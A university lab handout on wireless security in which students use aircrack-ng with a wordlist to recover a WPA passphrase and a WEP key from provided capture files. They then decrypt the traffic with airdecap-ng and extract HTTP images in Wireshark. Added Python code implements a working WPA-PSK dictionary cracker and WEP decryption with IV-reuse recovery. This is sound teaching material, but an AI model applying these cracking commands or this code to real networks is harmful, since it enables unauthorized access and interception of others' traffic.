
CyberP3i Hands-on Lab Series
Lab Series using NETLAB Designer: Dr. Lixin Wang, Associate Professor
Hands-On Lab on Securing Wireless Networks
The NDG Security+ Pod Topology Is Used

1. Introduction

In this lab, students decrypt WPA and WEP traffic and then analyze the 802.11 (wireless) packets.

2. Objectives

Upon completion of this lab, students will
1) be able to examine and decrypt WPA wireless traffic
2) be able to examine and decrypt WEP wireless traffic
3) be familiar with using the Wireshark tool

3. POD Topology

4. Lab Settings

The information in the table below is needed to log into the virtual machines used in this lab. The task section (Section 5) below provides details on the use of this information.

Pre-Lab Setup

Before continuing to the tasks, log into the following system as instructed. For the virtual machine Kali:
1. On the login screen, select Other
2. When presented with the username, type root. Press Enter
3. When prompted for the password, type toor. Press Enter
4. Minimize the PC viewer window

5. Lab Instructions

Part 1. Decrypt WPA traffic and analyze the 802.11 (wireless) packets

1) On the Kali virtual machine, open a terminal and type wireshark. The Wireshark program will open
2) On the Wireshark window, click File > Open; the Open Capture File window opens
3) Select File System on the left pane, then navigate to the directory tmp/captures on the right pane
4) Select the file WPA-01.cap and then click Open at the bottom of the window
5) In the Filter pane of the Wireshark window, type http and then click Apply. No traffic is displayed because the 802.11 data frames are encrypted, so Wireshark cannot dissect the HTTP carried inside them
6) Next we recover the WPA passphrase for the capture file WPA-01.cap with aircrack-ng, using the option -w to set the wordlist path to the file passlist under the directory /tmp/wordlists. You may also use - without the quotes to read candidate passphrases from standard input (stdin). Note that aircrack-ng does not break the cipher itself: it needs a captured four-way handshake (EAPOL frames) for the target network and tests each word in the list against the message integrity code (MIC) in that handshake
7) Change the focus to the terminal and run the following command (Linux commands and file names are case-sensitive):
   aircrack-ng -w /tmp/wordlists/passlist /tmp/captures/WPA-01.cap
8) aircrack-ng lists every network seen in the capture and asks which one to target. The Extended Service Set Identification (ESSID) is the human-readable network name shared by all access points of one extended service set; the Basic Service Set Identification (BSSID) is the 48-bit MAC address that identifies one particular access point (basic service set).

9) For "Index of target network?", type 2 for the network with the ESSID boguswifi. Since no valid WPA handshake was found for this network, aircrack-ng stops with the result listed below
10) Change the focus to the terminal and run the following command again
    aircrack-ng -w /tmp/wordlists/passlist /tmp/captures/WPA-01.cap
11) For "Index of target network?", type 5 for the network with the ESSID T4QY4. Again no valid WPA handshake was found, and the result is the same as above
12) Change the focus to the terminal and run the same command once more
    aircrack-ng -w /tmp/wordlists/passlist /tmp/captures/WPA-01.cap
13) For "Index of target network?", type 7 for the network with the ESSID Anthony98. Since no data packets were captured from this network, the result is as shown below

14) Change the focus to the terminal and run the command once more
    aircrack-ng -w /tmp/wordlists/passlist /tmp/captures/WPA-01.cap
15) For "Index of target network?", type 3 for the network with the ESSID TOWSON333. One valid WPA handshake is present for this network, so aircrack-ng tests the wordlist against it and recovers the WPA passphrase, as shown below. (Adding -e TOWSON333 to the command selects this network without the interactive prompt.)
16) Decrypt the 802.11 traffic for the wireless network TOWSON333. Type the command below, passing the ESSID with -e and the recovered passphrase with -p
    airdecap-ng -e TOWSON333 -p breezeless /tmp/captures/WPA-01.cap
17) airdecap-ng is the decryption tool of the Aircrack-ng suite. It can decrypt WEP/WPA/WPA2 capture files, and it can also be used to remove the wireless headers from an unencrypted wireless capture. It writes a new file ending in -dec.cap, the decrypted version of the input capture file. For WPA/WPA2 it derives the pairwise master key from the passphrase and ESSID and then the per-client session keys from each client's captured handshake, so only the traffic of clients whose handshake is in the capture can be decrypted

18) The total number of decrypted WPA data packets is 11401.
19) In Wireshark, click File > Open, navigate to the /tmp/captures directory and then select the file WPA-01-dec.cap
20) In the Filter pane of the Wireshark window, type http and then click Apply. The HTTP requests are now visible because the frame payloads have been decrypted
21) Select the File menu option and navigate to Export Objects > HTTP
22) A new window appears. Browse through the list and examine the image files downloaded. Find the entry with packet number 4860 and select it. Click the Save As button at the bottom
23) Accept the default and save the file in the directory /tmp/captures. Then click Save
24) View the image file by selecting the Places menu option from the top menu pane, clicking Recent Documents, and then selecting the file wireless-network-new-5.jpg. The result is shown below

25) Repeat steps 21 to 24 for the entry with packet number 10232, and save the file in the directory /tmp/captures. You can view the image file by selecting the Places menu option from the top menu pane and clicking Recent Documents; the result is shown below
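What aircrack-ng does for every word of the list in steps 6 to 15, and why it reports "no valid WPA handshake" for boguswifi and T4QY4, is easier to see in code. The following Python is an added example for this lab; it is not part of the lab material or of the Aircrack-ng suite. aircrack-ng extracts the BSSID, client MAC, the two nonces and the EAPOL-Key frame from the pcap; here those fields are taken as already extracted, and the handshake itself is constructed (fixed MACs and nonces, an empty key-data field instead of the RSN information element a real message 2 carries) so the example runs offline. The ESSID TOWSON333 and passphrase breezeless are the lab's; everything else is assumed.

```python
"""WPA/WPA2-PSK dictionary attack against a captured four-way handshake (added example)."""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass
class Handshake:
    """Fields a cracker pulls out of the captured four-way handshake."""
    ap_mac: bytes    # BSSID (authenticator address)
    sta_mac: bytes   # client (supplicant) address
    anonce: bytes    # 32-byte nonce from message 1
    snonce: bytes    # 32-byte nonce from message 2
    eapol: bytes     # complete EAPOL-Key frame of message 2, MIC field included


MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the 16-byte MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK derivation: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce))."""
    b = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
         + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL frame with its MIC field zeroed; the algorithm follows the key descriptor version."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7          # low 3 bits of Key Information
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if version == 1:                                           # WPA (TKIP): HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                           # WPA2 (CCMP): HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise NotImplementedError(f"key descriptor version {version} (AES-CMAC) not handled here")


def crack_psk(hs: Handshake, ssid: str, wordlist):
    """Return the first word whose derived KCK reproduces the captured MIC, or None."""
    target = hs.eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, ssid)     # the expensive step: 4096 HMAC-SHA1 rounds per word
        kck = ptk_from_pmk(pmk, hs)[:16]          # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), target):
            return word
    return None


def build_demo_handshake(ssid: str, passphrase: str) -> Handshake:
    """Constructed message-2 frame (not from the lab capture) whose MIC is valid for `passphrase`."""
    ap_mac = bytes.fromhex("00112233aabb")                # constructed BSSID
    sta_mac = bytes.fromhex("66778899ccdd")               # constructed client MAC
    anonce = hashlib.sha256(b"demo-anonce").digest()      # constructed, fixed so the run is repeatable
    snonce = hashlib.sha256(b"demo-snonce").digest()
    body = (bytes([0x02])                                 # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")                 # key info: version 2, pairwise, MIC bit set
            + (0).to_bytes(2, "big")                      # key length
            + (1).to_bytes(8, "big")                      # replay counter
            + snonce                                      # key nonce
            + bytes(16) + bytes(8) + bytes(8)             # key IV, RSC, key ID
            + bytes(16)                                   # MIC placeholder, zero while computing
            + (0).to_bytes(2, "big"))                     # key data length (RSN IE omitted in this demo)
    eapol = bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key
    hs = Handshake(ap_mac, sta_mac, anonce, snonce, eapol)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), hs)[:16]
    hs.eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return hs


if __name__ == "__main__":
    hs = build_demo_handshake("TOWSON333", "breezeless")
    words = ["letmein", "password", "breezeless", "qwerty"]   # stands in for /tmp/wordlists/passlist
    print("TOWSON333:", crack_psk(hs, "TOWSON333", words))
    print("boguswifi:", crack_psk(hs, "boguswifi", words))    # wrong ESSID salts the PBKDF2 differently
```

Two points the lab's output only hints at: the ESSID is a PBKDF2 salt, so the same passphrase gives a different PMK on every network, and without the client MAC, both nonces and the EAPOL MIC there is nothing to compare against, which is exactly the "no valid WPA handshake" case. The PBKDF2 round count is also why wordlist size, not cipher strength, decides how long the attack takes.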

Part 2. Decrypt WEP traffic and analyze the 802.11 (wireless) packets

1) On the Kali virtual machine, open a terminal and type wireshark. The Wireshark program will open
2) On the Wireshark window, click File > Open; the Open Capture File window opens
3) Select File System on the left pane, then navigate to the directory tmp/captures on the right pane
4) Select the file WEP1.cap and then click Open at the bottom of the window
5) In the Filter pane of the Wireshark window, type http and then click Apply. No traffic is displayed because the wireless traffic is encrypted
6) Next we recover the WEP key from the capture file WEP1.cap using aircrack-ng. No wordlist is needed here: WEP keys are recovered statistically from the initialization vectors (IVs) of the captured data frames, so this attack needs enough data packets rather than a handshake
7) Change the focus to the terminal and run the following command
    aircrack-ng /tmp/captures/WEP1.cap
8) The result is shown below
9) For "Index of target network?", type 1 for the network with the ESSID HUANGDOM. Key recovery for this network fails and the result is shown below

10) Change the focus to the terminal and run the following command again
    aircrack-ng /tmp/captures/WEP1.cap
11) For "Index of target network?", type 2 for the network with the ESSID RP7J4. Key recovery for this network fails as well; the result is shown below
12) Change the focus to the terminal and run the same command once more
    aircrack-ng /tmp/captures/WEP1.cap
13) For "Index of target network?", type 5 for the network with the ESSID TOWSON333. Key recovery for this network succeeds: aircrack-ng recovers the 64-bit WEP key (40 secret key bits plus the 24-bit IV), printed as five colon-separated hex bytes

14) After the WEP key is obtained, decrypt the network traffic with airdecap-ng.
15) Change the focus to the terminal and run the following command, passing the recovered key in hex with -w
    airdecap-ng -w AA:AA:AA:AA:AA /tmp/captures/WEP1.cap
16) The decryption succeeds and a total of 43220 WEP packets are decrypted
17) On the Wireshark window, click File > Open; the Open Capture File window opens
18) Select File System on the left pane, then navigate to the directory tmp/captures on the right pane
19) Select the file WEP1-dec.cap and then click Open at the bottom of the window
20) In the Filter pane of the Wireshark window, type http and then click Apply. Now you can see the HTTP requests within the 802.11 traffic because the WEP traffic has been decrypted with airdecap-ng
21) Select the File menu option and navigate to Export Objects > HTTP
22) A new window appears. Browse through the list and examine the image files downloaded. Find the entry with packet number 238 and select it. Click the Save As button at the bottom
23) Accept the default and save the file in the directory /tmp/captures. Then click Save

24) View the image file by selecting the Places menu option from the top menu pane, clicking Recent Documents, and then selecting the file los-angeles-downtown-45.4.jpg. The result is shown below
25) Repeat steps 21 to 24 for the entry with packet number 256 and save the file in the directory /tmp/captures. You can view the image file by selecting the Places menu option from the top menu pane, clicking Recent Documents, and then selecting the file Hampton-inn-los-angeles.jpg. The result is shown below
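The per-frame work behind step 15, where airdecap-ng -w turns the recovered key into plaintext, is short enough to write out. The Python below is an added example for this lab, not code from the lab or from the Aircrack-ng suite. It implements RC4, the WEP frame body layout (3-byte IV, key-ID byte, ciphertext, encrypted CRC-32 integrity check value) and the ICV check that tells a correct key from a wrong one, plus the keystream-reuse weakness that makes WEP recoverable in the first place. The key AA:AA:AA:AA:AA is the one the lab recovers; the IVs and the plaintexts are constructed.

```python
"""WEP decryption, ICV verification and the IV-reuse weakness (added example)."""
import zlib


def rc4(key: bytes, n: int) -> bytes:
    """Return the first n bytes of RC4 keystream for key (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                          # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                            # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def parse_wep_key(text: str) -> bytes:
    """Accept the AA:AA:AA:AA:AA form aircrack-ng prints, or plain hex as airdecap-ng documents it."""
    key = bytes.fromhex(text.replace(":", "").replace("-", ""))
    if len(key) not in (5, 13):
        raise ValueError("WEP key must be 40-bit (5 bytes) or 104-bit (13 bytes)")
    return key


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body = IV(3) || key-ID byte || RC4(IV || key) XOR (plaintext || CRC-32 ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")     # ICV is a plain CRC, not a keyed MAC
    keystream = rc4(iv + key, len(plaintext) + 4)         # the per-packet RC4 key is just IV || secret
    return iv + bytes([(key_id & 0x3) << 6]) + xor(plaintext + icv, keystream)


def wep_decrypt(key: bytes, body: bytes):
    """Decrypt one frame body; return the plaintext if the ICV verifies, else None (wrong key or corruption)."""
    iv, ciphertext = body[:3], body[4:]
    plain = xor(ciphertext, rc4(iv + key, len(ciphertext)))
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        return None
    return data


def recover_from_iv_reuse(body_known: bytes, plaintext_known: bytes, body_other: bytes):
    """Two frames under the same IV share one RC4 keystream. Known plaintext for one frame
    yields the keystream, and therefore the other frame's plaintext, with no key at all.
    The other frame must be no longer than the known one."""
    if body_known[:3] != body_other[:3]:
        return None                                       # different IVs, different keystreams
    icv = zlib.crc32(plaintext_known).to_bytes(4, "little")
    keystream = xor(body_known[4:], plaintext_known + icv)
    return xor(body_other[4:], keystream)[:-4]            # drop the other frame's ICV


if __name__ == "__main__":
    key = parse_wep_key("AA:AA:AA:AA:AA")                 # key the lab recovers for TOWSON333
    iv = b"\x01\x02\x03"                                  # constructed IV
    frame = wep_encrypt(key, iv, b"GET /los-angeles-downtown-45.4.jpg HTTP/1.1")   # constructed
    print(wep_decrypt(key, frame))                        # plaintext: the ICV verifies
    print(wep_decrypt(parse_wep_key("0102030405"), frame))  # None: wrong key fails the ICV check
    other = wep_encrypt(key, iv, b"GET /index.html HTTP/1.1")  # second frame, same IV
    print(recover_from_iv_reuse(frame, b"GET /los-angeles-downtown-45.4.jpg HTTP/1.1", other))
```

Two things to notice: the ICV is an unkeyed CRC, so it only detects an accidental mismatch and provides no authentication; and the 24-bit IV space is small enough that a busy network repeats IVs within hours, which is the entry point for the statistical attacks aircrack-ng runs in Part 2.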

6. References

Security+ Lab Series in NDG NETLAB+: Lab 4 Secure Implementation of Wireless Networking

7. Appendix

In this appendix, we introduce the two Aircrack-ng suite programs used in this lab, aircrack-ng and airdecap-ng.

7.1. Aircrack-ng

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK (pre-shared key) key cracking program and analysis tool for 802.11 wireless LANs. The aircrack-ng program can recover the WEP key once enough encrypted packets have been captured with airodump-ng, and can recover a WPA/WPA2-PSK passphrase by dictionary attack once a four-way handshake for the target network has been captured. The suite ships with Kali Linux, as it did with its predecessor BackTrack.

Usage of aircrack-ng

aircrack-ng [options] <capture file(s)>

Summary of all available options:

Option   Param.     Description
-a       amode      Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK).
-b       bssid      Long version --bssid. Select the target network based on the access point's MAC address.
-e       essid      If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA/WPA2-PSK cracking if the ESSID is not broadcast (hidden).
-p       nbcpu      Number of CPUs (threads) to use for cracking; on SMP systems all CPUs are used by default, and newer versions also accept the option on a non-SMP computer.
-q       none       Enable quiet mode (no status output until the key is found, or not).
-c       none       (WEP cracking) Restrict the search space to alphanumeric characters only (0x20-0x7F).
-t       none       (WEP cracking) Restrict the search space to binary coded decimal hex characters.
-h       none       (WEP cracking) Restrict the search space to numeric characters (0x30-0x39). These keys are used by default in most Fritz!Boxes.
-d       start      (WEP cracking) Long version --debug. Set the beginning of the WEP key (in hex), for debugging purposes.
-m       maddr      (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use each and every IV, regardless of the network.
-M       number     (WEP cracking) Sets the maximum number of IVs to use.
-n       nbits      (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.
-i       index      (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
-f       fudge      (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
-H       none       Long version --help. Output help information.
-l       file name  (Lowercase L, ell) Logs the key to the file specified. Overwrites the file if it already exists.
-K       none       Invokes the KoreK WEP cracking method. (Default in v0.x)
-k       korek      (WEP cracking) There are 17 KoreK statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-r       database   Utilizes a database generated by airolib-ng as input to determine the WPA key. Outputs an error message if aircrack-ng has not been compiled with sqlite support.
-x/-x0   none       (WEP cracking) Disable last keybytes bruteforce.
-x1      none       (WEP cracking) Enable last keybyte bruteforcing (default).
-x2      none       (WEP cracking) Enable last two keybytes bruteforcing.
-X       none       (WEP cracking) Disable bruteforce multithreading (SMP only).
-y       none       (WEP cracking) Experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.
-u       none       Long version --cpu-detect. Provide information on the number of CPUs and MMX support. Example responses to aircrack-ng --cpu-detect are "Nb CPU detected: 2" or "Nb CPU detected: 1 (MMX available)".
-w       words      (WPA cracking) Path to a wordlist, or - without the quotes for standard input (stdin).
-z       none       Invokes the PTW WEP cracking method. (Default in v1.x)
-P       none       Long version --ptw-debug. Invokes the PTW debug mode.
-C       MACs       Long version --combine. Merge the given APs to a virtual one.
-D       none       Long version --wep-decloak. Run in WEP decloak mode.
-V       none       Long version --visual-inspection. Run in visual inspection mode.
-1       none       Long version --oneshot. Run in oneshot mode.
-S       none       WPA cracking speed test.
-s       none       Show the key in ASCII while cracking.
-E       file       (WPA cracking) Create EWSA Project file v3.
-J       file       (WPA cracking) Create Hashcat Capture file.

7.2. Airdecap-ng

airdecap-ng is the decryption tool of the Aircrack-ng suite. It can decrypt WEP/WPA/WPA2 capture files, and it can also be used to remove the wireless headers from an unencrypted wireless capture. It outputs a new file ending with -dec.cap, the decrypted version of the input file. For WPA/WPA2 the capture must contain the four-way handshake of each client whose traffic is to be decrypted, since the per-session keys are derived from it.

Usage of airdecap-ng

airdecap-ng [options] <pcap file>

Option   Parameter  Description
-l                  don't remove the 802.11 header
-b       bssid      access point MAC address filter
-k       pmk        WPA/WPA2 Pairwise Master Key in hex
-e       essid      target network ASCII identifier
-p       pass       target network WPA/WPA2 passphrase
-w       key        target network WEP key in hexadecimal

Usage Examples

The following removes the wireless headers from an open network (no WEP) capture:
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

The following decrypts a WEP-encrypted capture using a hexadecimal WEP key:
airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap

The following decrypts a WPA/WPA2 encrypted capture using the passphrase:
airdecap-ng -e 'the ssid' -p passphrase tkip.cap

The Extended Service Set Identification (ESSID) and the Basic Service Set Identification (BSSID) are the two identifiers of an 802.11 service set. The ESSID is the network name shared by every access point in an extended service set; the BSSID is the 48-bit MAC address that identifies one basic service set, that is, the radio MAC address of the access point in infrastructure mode, or a randomly generated locally administered address in an ad hoc (IBSS) network with no access point.

8. Review Questions

1) Should I use WPA2, WPA or WEP network encryption on my own 802.11 wireless LAN?
2) Why is WPA more secure than WEP?
3) What security enhancements were made in WPA2 over its predecessor WPA?
4) What is the program aircrack-ng used for?
5) What is the program airdecap-ng used for?